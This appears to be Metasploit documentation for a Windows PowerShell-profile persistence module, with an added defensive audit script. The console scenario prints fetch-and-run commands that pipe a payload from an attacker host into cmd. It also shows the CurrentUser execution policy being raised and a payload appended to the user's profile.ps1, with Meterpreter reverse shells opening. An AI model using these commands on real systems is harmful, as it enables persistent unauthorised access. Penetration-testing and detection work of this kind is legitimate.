metasploit-gs/documentation/modules/exploit/windows/persistence/powershell_profile.md
2026-04-14 09:45:44 -04:00

Vulnerable Application

Instructions to get the vulnerable application. If applicable, include links to the vulnerable install files, as well as instructions on installing/configuring the environment if it is different than a standard install. Much of this will come from the PR, and can be copy/pasted.

Verification Steps

  1. Start msfconsole
  2. Get a shell on Windows
  3. Do: use exploit/windows/persistence/powershell_profile
  4. Do: set payload [payload]
  5. Do: set session #
  6. Do: run
  7. You should get a shell when PowerShell is opened on the target machine.

Options

PROFILE

The PowerShell profile to target. Choices are AUTO, ALLUSERSALLHOSTS, ALLUSERSCURRENTHOST, CURRENTUSERALLHOSTS, CURRENTUSERCURRENTHOST. Defaults to AUTO.

CREATE

If a profile file doesn't exist, create one. Defaults to false.

EXECUTIONPOLICY

Attempt to update the PowerShell execution policy so that the profile can execute. Defaults to true.
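The four non-AUTO values of PROFILE map onto the scoped paths that PowerShell exposes on the $PROFILE automatic variable, and the module's visible effects are a profile file that is created or appended to (the scenario shows it trying the AllUsers paths first, then falling back to the CurrentUser one) and, with EXECUTIONPOLICY, a change of the CurrentUser execution policy. The script below is an added audit example, not part of the module or its documentation: it enumerates those profile locations in the host it runs in, reports which ones exist with size, modification time and hash, flags content that looks like an appended launcher, and lists the execution policy for every scope so it can be compared with a baseline. The indicator patterns and the long-line threshold are assumptions chosen for illustration, not values taken from the module.

```powershell
# Added audit script (not part of the module or its documentation).
# Run inside the PowerShell host you want to audit: Windows PowerShell and
# PowerShell 7 keep their profiles in different directories, so $PROFILE
# resolves to the locations of the running host only.
# Indicator patterns and the long-line threshold are assumptions.

# $PROFILE carries the four scoped profile paths as NoteProperties; these are the
# same locations the module's ALLUSERS*/CURRENTUSER* choices refer to.
$profilePaths = [ordered]@{
    AllUsersAllHosts       = $PROFILE.AllUsersAllHosts
    AllUsersCurrentHost    = $PROFILE.AllUsersCurrentHost
    CurrentUserAllHosts    = $PROFILE.CurrentUserAllHosts
    CurrentUserCurrentHost = $PROFILE.CurrentUserCurrentHost
}

# Regular expressions typical of a dropped launcher (assumption; tune per environment).
$indicators = @(
    'Invoke-Expression', '\bIEX\b',
    '-EncodedCommand', '-enc\b',
    'FromBase64String',
    'DownloadString', 'Net\.WebClient',
    'Add-Type\s+-TypeDefinition',
    'VirtualAlloc', 'WriteProcessMemory'
)
# A hand-written profile rarely contains a single line this long (assumed threshold).
$longLineThreshold = 1000

function Test-ProfileContent {
    param([string]$Path)
    $text  = Get-Content -LiteralPath $Path -Raw -ErrorAction Stop
    $lines = $text -split "`r?`n"
    $hits  = foreach ($pattern in $indicators) {
        if ($text -match $pattern) { $pattern }
    }
    $longest = ($lines | Measure-Object -Property Length -Maximum).Maximum
    [pscustomobject]@{
        Indicators  = @($hits)
        LongestLine = $longest
        Suspicious  = (@($hits).Count -gt 0) -or ($longest -ge $longLineThreshold)
    }
}

foreach ($scope in $profilePaths.Keys) {
    $path = $profilePaths[$scope]
    if (-not (Test-Path -LiteralPath $path)) {
        "{0,-24} missing  {1}" -f $scope, $path
        continue
    }
    $item   = Get-Item -LiteralPath $path
    $hash   = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
    $result = Test-ProfileContent -Path $path
    "{0,-24} present  {1}" -f $scope, $path
    "    size={0} bytes  modified={1:u}  sha256={2}" -f $item.Length, $item.LastWriteTimeUtc, $hash
    "    longest line={0}  indicators={1}" -f $result.LongestLine, ($result.Indicators -join ', ')
    if ($result.Suspicious) {
        "    >>> review this profile: content matches appended-launcher heuristics"
    }
}

# The module may also raise the CurrentUser execution policy (Undefined -> RemoteSigned
# in the scenario below), so list every scope and compare with your baseline.
Get-ExecutionPolicy -List | Format-Table -AutoSize
```

A profile that is present but was never deliberately created, a recent modification time on a profile nobody edited, or a CurrentUser policy that differs from the baseline are the signals worth following up; the SHA256 lets the file be compared against a known-good copy or re-checked later.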

Scenarios

Windows 10 1909 (10.0 Build 18363)

Initial shell

[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/NB_U4Lr2Ty2xrjYqvzRVEg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55201) at 2026-02-04 17:06:23 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...

Install Persistence

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/powershell_profile 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/powershell_profile) > set create true
create => true
msf exploit(windows/persistence/powershell_profile) > set EXECUTIONPOLICY true
EXECUTIONPOLICY => true
msf exploit(windows/persistence/powershell_profile) > set session 1
session => 1
msf exploit(windows/persistence/powershell_profile) > rexploit
[*] Reloading module...
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/powershell_profile) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Powershell execution policy for CurrentUser (Undefined), will attempt to override
[*] Updating Powershell execution policy for CurrentUser to RemoteSigned
[*] C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
[*] C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
[*] C:\Users\windows\Documents\WindowsPowerShell\profile.ps1 does not exist, creating it...
[*] Powershell command length: 4193
[*] Appending payload to C:\Users\windows\Documents\WindowsPowerShell\profile.ps1
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260204.1237/WIN10PROLICENSE_20260204.1237.rc

Start powershell on the target computer

[*] Sending stage (190534 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55207) at 2026-02-04 17:13:02 -0500